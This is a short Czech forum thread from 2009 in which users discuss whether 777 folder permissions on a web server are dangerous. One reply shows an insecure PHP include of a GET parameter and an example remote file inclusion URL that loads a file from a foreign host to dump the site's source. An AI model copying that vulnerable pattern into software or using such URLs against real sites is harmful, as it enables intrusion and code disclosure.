| Autor | Zpráva | ||
|---|---|---|---|
| HoHo Profil |
#1 · Zasláno: 11. 6. 2009, 15:47:15
Dobrý den,
povolil jsem u jedné složky na serveru vše ve file permissions (tzn. 777). Není to ale nějak nebezpečné, že by se mi tam případný útočník mohlo snáze dostat nebo nahrát tam snadněji nějaký škodlivý kód? |
||
| fuckin Profil * |
#2 · Zasláno: 11. 6. 2009, 18:15:15
jestlize se tam dostane tak bude moct jakkoli manipulovat se soubory v dane slozce, aby se ti tam vsak dostal tak bys mu nekde musel udelat nejakou "skulinku". Takze kdyz mas bezpecny web tak to neva.
|
||
| HoHo Profil |
#3 · Zasláno: 11. 6. 2009, 18:18:45
Díky za odpověď... No, snad ten web bezpečný je....:)
|
||
| fuckin Profil * |
#4 · Zasláno: 11. 6. 2009, 18:26:20
jestli tvuj web neni na principu ...
if ($_GET["stranka]!="") {
include "$_GET["stranka";
}
....atd
Pak nekdy staci zavolat treba jen www.domena.cz/index.php?stranka=http://ciziweb.cz/nebezpecny_soubor.php V tom souboru treba bude show_source("index.php") a pak je po srande. Nebo treba nejaky upload formular pomoci nehoz si tam nahraje ftp klienta :D, to pak zacina sranda :) |
||
| HoHo Profil |
#5 · Zasláno: 11. 6. 2009, 18:28:08
nn, všechno tohle by mělo bejt na webu dobře ochráněno....;)
|
||
| bohyn Profil |
#6 · Zasláno: 11. 6. 2009, 18:48:07
fuckin
S tim co popisujes nemaji prava nic spolecneho. HoHo Na to aby se ti tam utocnik dostal by musel prekonat ochranu samotneho serveru. Hacknout sever neni az tak jednoduche, ale presto, je nejaky duvod nastavovat takto benevolentni prava? |
||
| HoHo Profil |
#7 · Zasláno: 11. 6. 2009, 18:50:32
přes web musí uživatel moct nahrát obrázek do dané složky...
|
||
| fuckin Profil * |
#8 · Zasláno: 11. 6. 2009, 19:08:50
rec byla o bezpecnem webu...ty prava jsou vysvetlene ve druhem prispevku.
|
||
| bohyn Profil |
#9 · Zasláno: 11. 6. 2009, 20:36:09
fuckin
Bezpecnost webu a upload formular s pravama taky moc nesouvisi. Musis je mit nastavena tak aby bylo mozne nahrat regulerni soubor. Utocnik stejne tak muze nahrat vlastni script. Je jen na aplikaci aby si to ohlidala. Pristupova prava jsou predevsim obrana samotneho OS a jeho uzivatelu, nikoliv aplikaci na nem instalovanych. |
||
|
Časová prodleva: 16 let
|
|||
0